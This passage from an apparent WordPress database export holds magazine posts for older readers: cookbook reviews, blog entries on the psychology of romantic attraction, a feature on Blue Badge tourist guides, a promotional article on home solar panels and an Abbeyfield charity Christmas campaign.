molasses and mixing up mincemeat and orange trifle. His words touch something deep and primitive: appetite. A gorgeous book in the pure sense.</p>&#13;\n<h3 class=\"para para_$ID/NormalParagraphStyle\">The Food of Morocco, Paula Wolfert, Bloomsbury, £35</h3>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">“North African bread is sacred and is treated with respect. If you see a piece lying on the ground, you pick it up and kiss it and put it somewhere it will not be stepped on.” This resplendent book of Moroccan recipes reflects cookery writer Paula Wolfert’s passion for the cooking customs and for the country itself.</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">Rich with pictures of plump sacks of spices and grains, stems of saffron and steaming couscous, it takes you intelligently through the essential ingredients and methods: argan oil, ras-el-hanout; tagines and bastillas, and into a wealth of recipes, all headed up with a little Moroccan kitchen history.</p>&#13;\n<h3 class=\"para para_$ID/NormalParagraphStyle\">Rosemary Shrager’s Absolutely Foolproof Food for Family and Friends, Hamlyn, £18.99</h3>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">There’s an entirely pleasant waft of pantry and pressed white apron to this home-cookery masterclass from Swinton Park Cookery School chef Rosemary Shrager. You can almost hear her cheerfully chivvying you to try your hand at such rewarding kitchen challenges as raising your own pork pie or crowning a pheasant – illustrated with clear-as-consommé, step-by-step pictures. Alongside the methodology are tasty modern classic twists – from roast quail with saffron risotto to dover sole in a curry coating.</p>&#13;\n									</div>','Add flavor to your recipe repertoire','Kerry Fowler sinks her teeth into the latest recipe books hitting the shelves Simple Cooking, Antonio Carluccio, Quadrille Publishing, £9.99 “The biggest','publish','open','open','','add-flavor-to-your-recipe-repertoire','','','2018-04-02 20:04:56','2018-04-02 20:04:56','',0,'http://westonspirit.org.uk/add-flavor-to-your-recipe-repertoire.asp',0,'post','',0),(226,1,'2015-12-15 23:25:33','2015-12-15 23:25:33','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">17 August 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\">By</span> drloriboul\" title=\"Posts by Dr Lori Boul\" rel=\"author\"&gt;Dr Lori Boul</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Be Still My Beating Heart\" st_url=\"http://westonspirit.org.uk/2012/08/be-still-my-beating-heart/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Be Still My Beating Heart\" st_url=\"http://westonspirit.org.uk/2012/08/be-still-my-beating-heart/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Be Still My Beating Heart\" st_url=\"http://westonspirit.org.uk/2012/08/be-still-my-beating-heart/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Be Still My Beating Heart\" st_url=\"http://westonspirit.org.uk/2012/08/be-still-my-beating-heart/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Be Still My Beating Heart\" st_url=\"http://westonspirit.org.uk/2012/08/be-still-my-beating-heart/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h3>Psychology Of Love – Part 6</h3>&#13;\n<p>That we use a phrase like ‘falling in love’ suggests that it is something over which we have no control. Our hearts race, palms sweat, we breathe faster and get butterflies in our stomach – it must be love. But is it? Or, is it possible that we can mistake these feelings for love when they are actually due to something else?</p>&#13;\n<p>Researchers have found that people are more susceptible to become romantically and sexually attracted to complete strangers if they are in an emotionally ‘ready’ state. In a variety of studies, in which emotions such as fear have been induced, participants have reported increased romantic interest and sexual feelings.</p>&#13;\n<p>In one such experiment, men aged 18 to 35 were approached by a female researcher after they had crossed two different types of bridges. One bridge was an unstable suspension bridge 230 feet above a canyon, which was only about 3 feet wide and swayed in the breeze. The other bridge was only 10 feet above a shallow river and it was solid, wide and had handrails. As each man crossed their respective bridges the researcher, an attractive women, asked them to invent a short story to help her with her research. After the interview the researcher offered them her telephone number so that they could contact her if they had any questions. This experiment found that men who crossed the suspension bridge not only produced more sexual images in their stories but they were also four times more likely to telephone the researcher than those who crossed the solid bridge. This was explained as mistaking the fear response to crossing the rickety bridge (heart racing, sweaty palms and rapid breathing) for feelings of being ‘in love’ or at least sexually attracted to the researcher.</p>&#13;\n<p>However, real fear isn’t necessary, imagined fear has been shown to produce the same reactions. In the Painful Shock Experiment researchers wanted to know if the threat of pain could produce sexual attraction. They recruited two groups of people and asked them to complete a questionnaire, which included a question on how attractive they found the experimenter. One group was informed “We will begin the experiment in a moment” while the other was told “We will begin the painful shock experiment in a moment”. Intuitively, unless they were masochists, the group that were given the painful shock instruction should be less likely to be attracted to an experimenter that was going to cause them pain. But this wasn’t the case. The people that got the painful shock instruction were more likely to find the experimenter attractive. Why? Thinking about the painful shock prompted a physical fear response and their rapid heart beats, sweaty palms and shallow breathing increased their ratings of the attractiveness of the researcher.</p>&#13;\n<p>But it isn’t only fear that can make us think that one person is more attractive than another. A simple rhythmic beat can be enough for us to ‘fall in love’. In the Playboy Experiment male subjects were asked to look at slides containing centerfolds from Playboy magazine and asked how attracted they are to the women in the photographs. They were wearing headphones through which they could hear their own heartbeat. But there was a twist. They were not listening to their own heartbeat but a recording of a heartbeat, the speed of which was being controlled by the experimenter. As the photographs appeared the experimenter would speed up the heart beat recording for just one of the centerfolds. It didn’t matter which photograph was on the screen, the woman rated as most attractive was the one that they were looking at while hearing a rapid heart beat. So, they were fooled into finding one particular woman more attractive than another simply by the beat of a heart.</p>&#13;\n<p>Since the majority of people don’t meet their partners on a suspension bridge, or in a dentists waiting room or have the opportunity to regulate perceptions of heart beats it might be difficult to know how this research can help us understand ‘love’. But, physical arousal levels can be influenced by everyday situations. For example, people who run on a treadmill have been more likely, than people who just sit around, to find an experimenter more attractive. Watching scary movies, roller coaster rides, strong coffee, alcohol, recreational drugs and listening to music can all produce the ‘symptoms’ of love. In fact almost anything that increases arousal levels can make us all fools for love.</p>&#13;\n<p>While much of the research on arousal and attraction has been conducted using younger participants, older daters are just as likely to be fooled by their ‘urges’ – just because there is snow on the mountain doesn’t mean there is no fire down below. Given that we often meet partners in social settings, in which music and alcohol flow freely, it is possible that ‘falling in love’ is no more than a physical reaction to the moonlight, music and copious amounts of booze. Perhaps this is why some of the princes or princesses we take home from our nights on the town turn into frogs before morning.</p>&#13;\n<p><strong>In Blog 7: Love Thy Neighbour? <div class=\"woo-sc-hr\"></div></strong></p>&#13;\n<p><em><strong><a href=\"http://www.drloriboul.com/\" target=\"_blank\"><img class=\"alignright  wp-image-2842\" title=\"Dr Lori Boul\" src=\"/wp-content/uploads/2012/08/Dr-Lori-Boul2.jpg\" alt=\"\" width=\"144\" height=\"198\" />Dr. Lori Boul</a></strong></em> gained her PhD at the University of Sheffield in the UK and the research for her thesis, into ‘male menopause’, attracted worldwide media attention. Dr Lori is probably one of the most outspoken speakers on the topic of human sexuality and in writing her book <em><strong><a href=\"http://www.howtobooks.co.uk/display.asp?K=9781845284749&amp;sf_01=CAUTHOR&amp;sort=SORT_TITLE&amp;st_02=diy+sex&amp;sf_02=CTITLE&amp;sf_03=KEYWORD&amp;sf_04=identifier&amp;m=1&amp;dc=1\" target=\"_blank\">DIY Sex and Relationship Therapy</a></strong></em> has dared to challenge the need for face-to-face therapy. According to Dr Lori, “Good therapists can be hard to find and for many people a good spoonful of common sense is all that is needed”.</p>&#13;\n<p>Whether speaking to the general public or professionals, Dr Lori’s expertise, sensitivity and humour inspire new ways of thinking about relationships, sex and psychology. She has presented talks at national and international conferences, provides training courses and executive mentoring, and is featured as a regular guest speaker with Cunard.</p>&#13;\n<h5><a href=\"http://www.drloriboul.com/\" target=\"_blank\"> www.drloriboul.com</a> <div class=\"woo-sc-hr\"></div></h5>&#13;\n									</div>','Be Still My Beating Heart','Psychology Of Love - Part 6 That we use a phrase like ‘falling in love’ suggests that it is something over which we have no control. Our hearts race, palms','publish','open','open','','be-still-my-beating-heart','','','2018-04-02 20:04:54','2018-04-02 20:04:54','',0,'http://westonspirit.org.uk/be-still-my-beating-heart.asp',0,'post','',0),(227,1,'2015-10-18 15:55:55','2015-10-18 15:55:55','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">26 August 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\">By</span> croberts\" title=\"Posts by Steve Martin\" rel=\"author\"&gt;Steve Martin</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Bringing history to life\" st_url=\"http://westonspirit.org.uk/2012/08/bringing-history-to-life-2/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Bringing history to life\" st_url=\"http://westonspirit.org.uk/2012/08/bringing-history-to-life-2/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Bringing history to life\" st_url=\"http://westonspirit.org.uk/2012/08/bringing-history-to-life-2/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Bringing history to life\" st_url=\"http://westonspirit.org.uk/2012/08/bringing-history-to-life-2/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Bringing history to life\" st_url=\"http://westonspirit.org.uk/2012/08/bringing-history-to-life-2/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>Are you hooked on history? Clued up on culture? If so, then now is the time to share your passion and get a Blue Badge, says Steve Martin</h4>&#13;\n<p><img width=\"300\" height=\"449\" src=\"/wp-content/uploads/2012/08/Copy-of-Geoffrey-Warr.jpg\" style=\"float:left; margin-right:15px\" /></p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">As a tourist guide, Rosalind Hutchinson spends her days bringing history to life. But she didn’t expect it to come quite so vividly to life as it did on a ‘Smugglers and Spectres’ tour in Kent.</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">“I was telling the group about the terrible deeds of a smuggling family called the Ransleys – the leader had two sets of teeth in his top jaw and would brand people with a bite – when an Australian voice at the back of the coach piped up: ‘I’m a Ransley!’ That was quite a moment.”</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">Hutchinson holds a Blue Badge, the country’s top tourist guiding qualification, and after 30 years of escorting visitors round the sights of London and beyond, she takes most things in her stride. She loves the variety and the constant learning. “Researching new venues is one of the things that makes it so exciting,” she says.</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">A typical week could involve anything from a Sherlock Holmes tour for participants of a crime writers’ convention to explaining the neo-classical architecture of Spencer House, an 18th century private palace near Green Park, where she runs a team of guides.</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">Like many Blue Badge holders, she is on her second career. A former midwife, she started guiding to provide a part time income after her own children were born. It’s also a popular choice for active retirees, with around 45 per cent of Blue Badge guides aged over 60. Most guides work on a freelance basis, finding work from tour agencies and through networking.</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">Geoffrey Warr, 78, took up guiding 19 years ago after a career in the oil industry. “I was in the British Museum one day and picked up a flyer about guided tours and I thought ‘I could do that’,” he says.</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">But he is keen to dispel the notion that it’s just an interesting hobby for older people. “When I get up at 5am to drive down to Dover to meet a group, I don’t quite look at it that way.” Throughout the summer he averages three days of guiding every week and, as a German speaker, spends much of the time showing German tourists around London. The work can be physically and mentally demanding. “You’re concentrating all the time. Younger guides get just as tired,” he says.</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">And it’s certainly not a case of delivering the same spiel over and over again, says Hutchinson.</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">“The art of guiding is the selection of knowledge for the people you’re with so you have to listen to the group in order to give them what they want. You have to be very careful you don’t start lecturing them. If somebody asks me if I used to be a school teacher, I don’t take that as a compliment!”</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">As well as history, you also need a knowledge of popular culture and he is sometimes surprised by tourists’ love of British television programmes and films, he adds.</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">“One of the questions children often ask is where Mr Bean lives.”</p>&#13;\n									</div>','Bringing history to life','Are you hooked on history? Clued up on culture? If so, then now is the time to share your passion and get a Blue Badge, says Steve Martin As a tourist','publish','open','open','','bringing-history-to-life-2','','','2018-04-02 20:04:52','2018-04-02 20:04:52','',0,'http://westonspirit.org.uk/bringing-history-to-life-2.asp',0,'post','',0),(229,1,'2016-10-09 09:22:09','2016-10-09 09:22:09','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">26 August 2017</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Building a bright future\" st_url=\"http://westonspirit.org.uk/2012/08/building-a-bright-future/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Building a bright future\" st_url=\"http://westonspirit.org.uk/2012/08/building-a-bright-future/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Building a bright future\" st_url=\"http://westonspirit.org.uk/2012/08/building-a-bright-future/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Building a bright future\" st_url=\"http://westonspirit.org.uk/2012/08/building-a-bright-future/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Building a bright future\" st_url=\"http://westonspirit.org.uk/2012/08/building-a-bright-future/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                		&#13;\n                	                	<h4>The trend for eco-friendly energy is soaring, but that doesn’t have to mean the cost does too</h4>&#13;\n<p><img width=\"596\" height=\"447\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/08/Copy-of-Puragen.jpg\" style=\"float:left; margin-right:15px\" /></p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">The UK has witnessed an explosion in the installation of solar PV systems over the past two years. A switch in emphasis to greener living and government-backed initiatives such as the Feed in Tariff (FiT) have made the sight of solar panels common place on roofs up and down the country.</p>&#13;\n<h3 class=\"para para_$ID/NormalParagraphStyle\">Beat energy inflation</h3>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">The demand for cleaner electricity is set to grow as energy costs in the home continue to escalate, the costs of installation come down and people make a conscious decision to live a greener lifestyle.</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">“Rising energy costs are an issue for every household and controlling those costs over the next 10 to 15 years will be essential,” says Jeremy Malindine, head of renewable experts Puragen.</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">“Installing renewable technologies gives people the opportunity to take some control of their energy consumption and offset the costs at the same time.”</p>&#13;\n<h3 class=\"para para_$ID/NormalParagraphStyle\">Tax-free return</h3>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">The returns afforded to customers via government initiatives such as FiT have made investment in renewable technologies a sound choice – particularly at a time when interest rates at the bank are low.</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">FiT is the amount of money paid back to customers for every kilowatt of electricity produced. Since the launch of the FiT scheme in April 2010 there have been more than 350,000 solar PV installations in the UK – almost three times the figure initially projected.</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">With installation costs now falling, investing in renewable technologies continues to make sound economic sense.</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">“The cost of installing solar panels has fallen dramatically and people can still generate returns of up to eight or nine per cent on their money over a 20 year period,” adds Malindine.</p>&#13;\n<p>“That is better than any bank rate.”</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">A standard 3kW system can generate over 2,400 kilowatt hours of electricity a year. This is more than half of a typical household’s annual electricity needs and can mean a saving of more than £300 on fuel bills alone – with further money generated via the FiT.</p>&#13;\n<h3 class=\"para para_$ID/NormalParagraphStyle\">Increase home value</h3>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">Research also shows that renewable technologies can add value to the property with half of UK homeowners believing homes with greener features are easier to sell.</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">“Solar PV is now becoming an attractive option for homeowners looking to invest in technology that is both green and profitable,” claims Malindine.</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">“It is easy to install, requires little maintenance and through a combination of government incentives and savings in energy bills, renewable energy is one home improvement that is likely to grow in value year on year.” </p><div class=\"woo-sc-hr\"></div>&#13;\n<h5 class=\"para para_$ID/NormalParagraphStyle\"> <em><a href=\"http://www.puragen.co.uk/\" target=\"_blank\">www.puragen.co.uk</a> <div class=\"woo-sc-hr\"></div></em></h5>&#13;\n									</div>','Building a bright future','The trend for eco-friendly energy is soaring, but that doesn’t have to mean the cost does too The UK has witnessed an explosion in the installation of','publish','open','open','','building-a-bright-future','','','2018-04-02 20:04:51','2018-04-02 20:04:51','',0,'http://westonspirit.org.uk/building-a-bright-future.asp',0,'post','',0),(230,1,'2017-09-23 06:33:49','2017-09-23 06:33:49','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">26 August 2017</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Festive Friends\" st_url=\"http://westonspirit.org.uk/2012/08/festive-friends/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Festive Friends\" st_url=\"http://westonspirit.org.uk/2012/08/festive-friends/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Festive Friends\" st_url=\"http://westonspirit.org.uk/2012/08/festive-friends/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Festive Friends\" st_url=\"http://westonspirit.org.uk/2012/08/festive-friends/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Festive Friends\" st_url=\"http://westonspirit.org.uk/2012/08/festive-friends/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                		&#13;\n                	                	<h4>You dont’ have to be lonely this Christmas, as one charity prepares to open its doors to those facing the holiday season alone</h4>&#13;\n<p><img width=\"596\" height=\"419\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/08/Copy-of-Abbeyfield.jpg\" style=\"float:left; margin-right:15px\" /></p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">T o help combat the increasing trend in festive isolation among older people, Abbeyfield is once again launching its Companionship at Christmas campaign.</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">The initiative is a home-from-home alternative devised for older people who wish to spend the festive period with others.</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">Sadly, loneliness still continues to plague society, social isolation is considered to be just as bad for you as smoking or being an alcoholic and according to recent studies, does more damage to your health than not exercising!</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">Living alone or feeling lonely is something that is accepted and not talked about; people generally become accustomed to their own company. However, in the run-up to Christmas when there is a barrage of cheery festive advertisements depicting happy times shared with family and friends, the sense of isolation and loneliness that people don’t usually notice can be magnified.</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">Abbeyfield is inviting older people who are alone over Christmas, residents with elderly neighbours living alone, and family members in need of respite support over the Christmas period to get in touch.</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">Look out for actor Geoffrey Palmer, who has agreed to be the spokesperson for the Companionship at Christmas campaign; he will be helping to raise awareness of the initiative.</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">The charity would like to hear from people who are aged 55 years and over, currently living independently in their own home and who will be alone or lonely over Christmas. The participating houses will welcome visits from the public on or around UK Older People’s Day when they will participate in the Big Skills Share hosting a number of activities on 1 October.</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">Paul Allen, CEO of the charity says: “Our aim is to enhance the quality of life for older people. We hope people accept our invitation and visit our Older Person’s Day events – it will really enhance the Christmas experience.”</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">Nearly 60 years ago, Richard Carr-Gomm founded Abbeyfield, a charity that was set up to provide companionship and housing for older people who lived alone or were lonely. Today, Abbeyfield has over 500 houses in the UK providing housing, support and a wide range of quality services with companionship still very much at the centre of what they provide.</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">It is a sad reality that in this day and age, charities and agencies similar to Abbeyfield are still trying to raise awareness of the struggles older people face and the very real impact of loneliness.</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">As the Abbeyfield Christmas initiative begins, the charity would like everyone to consider someone that they know to be living alone without much contact with others to bring this campaign to their attention, visit the website to find out about the nearest participating house, or contact Abbeyfield.</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">As part of the Christmas campaign Abbeyfield will be offering delicious Christmas lunches and overnight stays in Abbeyfield locations across England and Wales.</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">The campaign has already received the backing of a number of MPs, other charitable organisations and local authorities charged with taking care of the elderly around the country, who agree that the scheme provides an invaluable lifeline for older people. </p><div class=\"woo-sc-hr\"></div> &#13;\n<h5 class=\"para para_$ID/NormalParagraphStyle\"><em>0845 052 3553</em></h5>&#13;\n<h5 class=\"para para_$ID/NormalParagraphStyle\"><a href=\"http://www.abbeyfield.com/\" target=\"_blank\"><em>www.abbeyfield.com </em></a></h5>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\"><em></em></p><div class=\"woo-sc-hr\"></div>&#13;\n									</div>','Festive Friends','You dont\' have to be lonely this Christmas, as one charity prepares to open its doors to those facing the holiday season alone T o help combat the increasing','publish','open','open','','festive-friends','','','2018-04-02 20:04:49','2018-04-02 20:04:49','',0,'http://westonspirit.org.uk/festive-friends.asp',0,'post','',0),(231,1,'2015-05-20 15:11:36','2015-05-20 15:11:36','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">28 August 2017</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Get up and go – August\" st_url=\"http://westonspirit.org.uk/2012/08/get-up-and-go-august/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Get up and go – August\" st_url=\"http://westonspirit.org.uk/2012/08/get-up-and-go-august/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Get up and go – August\" st_url=\"http://westonspirit.org.uk/2012/08/get-up-and-go-august/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Get up and go – August\" st_url=\"http://westonspirit.org.uk/2012/08/get-up-and-go-august/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Get up and go – August\" st_url=\"http://westonspirit.org.uk/2012/08/get-up-and-go-august/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<p>As distributed in <em>The Sunday Telegraph</em> August 26th</p>&#13;\n<p>As summer draws to an end, it seems the whole nation has had 50 Shades of Grey on its holiday reading list – the August edition of <em>Get Up and Go </em>asks what’s driving this new openness, examining changing attitudes to sex and femininity over 50. We also meet actress Miriam Margoyles of Harry Potter fame, and hear what happened when Hunter Davies went cruising.</p>&#13;\n<p><object style=\"width:610px;height:400px\"><param name=\"movie\" value=\"http://static.issuu.com/webembed/viewers/style1/v1/IssuuViewer.swf?mode=embed&amp;documentId=120828090348-7773636f24af44eca368cb3b78c66268&amp;docName=guag_7_final&amp;username=Lyonsdown&amp;loadingInfoText=Get%20up%20and%20Go%20-%20Issue%207&amp;layout=http%3A%2F%2Fskin.issuu.com%2Fv%2Flight%2Flayout.xml\" /><param name=\"allowfullscreen\" value=\"true\" /><param name=\"menu\" value=\"false\" /><embed src=\"/webembed/viewers/style1/v1/IssuuViewer.swf\" type=\"application/x-shockwave-flash\" style=\"width:610px;height:400px\" flashvars=\"mode=embed&amp;documentId=120828090348-7773636f24af44eca368cb3b78c66268&amp;docName=guag_7_final&amp;username=Lyonsdown&amp;loadingInfoText=Get%20up%20and%20Go%20-%20Issue%207&amp;layout=http%3A%2F%2Fskin.issuu.com%2Fv%2Flight%2Flayout.xml\" allowfullscreen=\"true\" menu=\"false\"></embed></object> </p><div class=\"woo-sc-hr\"></div>&#13;\n<p><a href=\"http://www.ewartshaw.co.uk/financepublications/2012/GUAG_7_final.pdf\" target=\"_blank\">Downloadable PDF</a> </p><div class=\"woo-sc-hr\"></div>&#13;\n<p> </p>&#13;\n<p> </p>&#13;\n									</div>','Get up and go – August','As distributed in The Sunday Telegraph August 26th As summer draws to an end, it seems the whole nation has had 50 Shades of Grey on its holiday reading list','publish','open','open','','get-up-and-go-august','','','2018-04-02 20:04:47','2018-04-02 20:04:47','',0,'http://westonspirit.org.uk/get-up-and-go-august.asp',0,'post','',0),(232,1,'2017-04-10 11:18:58','2017-04-10 11:18:58','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">10 August 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\">By</span> drloriboul\" title=\"Posts by Dr Lori Boul\" rel=\"author\"&gt;Dr Lori Boul</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Getting to Know You\" st_url=\"http://westonspirit.org.uk/2012/08/getting-to-know-you/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Getting to Know You\" st_url=\"http://westonspirit.org.uk/2012/08/getting-to-know-you/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Getting to Know You\" st_url=\"http://westonspirit.org.uk/2012/08/getting-to-know-you/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Getting to Know You\" st_url=\"http://westonspirit.org.uk/2012/08/getting-to-know-you/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Getting to Know You\" st_url=\"http://westonspirit.org.uk/2012/08/getting-to-know-you/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h3>Psychology Of Love – Part 5</h3>&#13;\n<p>We don’t like to believe that physical attractiveness accounts for much in life, particularly since we can’t do much about it. Many people argue that beauty is only skin deep and when it comes to falling in love it takes more than a handsome face or a curvy shape. Indeed, when asked what they looked for in a potential date, most people put physical attractiveness at the bottom of their list.</p>&#13;\n<p>Countless surveys have been conducted that suggest the inner person is more important than looks when it comes to love. Qualities like personality, intelligence, sensitivity, warmth, shared values, and a sense of humour are frequently cited as more important than physical appearance. Indeed, some people argue that making decisions based on beauty is very shallow. But, according to psychologists, beautiful packaging not only influences what we think of people but who we are likely to date and who we might date for a second time.</p>&#13;\n<p>Tolstoy wrote, ‘it is amazing how complete is the delusion that beauty is goodness”, a sentiment that research appears to support. Scientists tell us that we perceive physically attractive people as possessing a host of positive qualities, simply because they are ‘beautiful’. This is referred to as the ‘Halo Effect’. Both sexes believe that those who are attractive are more interesting, sociable, independent, exciting, sexual, intelligent, well adjusted, socially skilled and successful; handsome men are perceived as more masculine and beautiful females more feminine. As if this wasn’t bad enough, attractive people earn more money and are more likely to get promoted. Just to add insult to injury, when they appear in a court of law they pay less bail, are less likely to get convicted and if they do they are more likely get shorter sentences. So, in the case of the ‘beautiful’ people, there seems to be a pretty unrestrained ‘halo’ effect. We see a pretty/handsome face and believe that they are ‘superior’ beings on every level – making it oh so easy to be blinded by looks and believe we are in love.</p>&#13;\n<p>That the power of physical appearance has far reaching effects can be seen in the Frizzy Wig experiment. In this study scientists found that we really, really care about the opinions of attractive people. This experiment used an attractive woman to interview men and, following the interview, give them her own personal clinical evaluation of their personality. For half of the interviews she was made to be more attractive, for the other half she was made to look ugly, dressed in frumpy clothes, with bad make-up and a frizzy wig (hence the name of the experiment). In both conditions (attractive/unattractive) she gave the men either favourable or unfavourable personality evaluations. How do they respond? Well, when she was made to look unattractive they didn’t really care what kind of feedback she gave. However, when she was made to look attractive they were delighted when she gave them positive feedback but really upset when the feedback was negative. Besides being upset, these men tried to find ways to prove to her that she was wrong about them. So, the opinions of physically attractive people matter to us. If they compliment and flatter us we could easily fall for a pretty/handsome face. If they don’t we might try even harder to earn their approval and fool ourselves that our efforts are because we are truly, madly, deeply, ‘in love’.</p>&#13;\n<p>But, if you never get a second chance to make a first impression how much does this initial attraction predict love or is it what is on the inside that counts? To answer this question scientists conducted a study referred to as the Blind Date experiment. This research was designed to find out what was more important, looks or personality. In this experiment a lot of people were sent out on blind dates and researchers looked at what predicted a second date. Despite the fact that people say that personality is important, it wasn’t intelligence, masculinity, femininity, dominance, submission, dependence, independence, sensitivity, sincerity, warmth, compassion or sense of humour that predicted a second date. What was it? Looks. We might like to believe that looks don’t matter but unfortunately they do – if we aren’t attracted to the outward appearance of the people we meet we are unlikely to get to know the inner person. Therefore, while Beauty fell for the Beast their chances of a long-term relationship would be slim.</p>&#13;\n<p>While the research on love and attraction indicates that looks are more important than personality it has been almost exclusively conducted using young participants. Since few people (young or old) find grey hair and wrinkles attractive what are ‘mature’ daters falling for? Given the boom in anti-ageing produces and plastic surgery it could still be physical appearance. If it is, we can be grateful that Mother Nature blesses those of more advanced years with poor eyesight so that we can find our prince or princess by simply leaving our glasses at home.</p>&#13;\n<p><strong>In Blog 6: Be Still My Beating Heart <div class=\"woo-sc-hr\"></div></strong></p>&#13;\n<p><em><strong><a 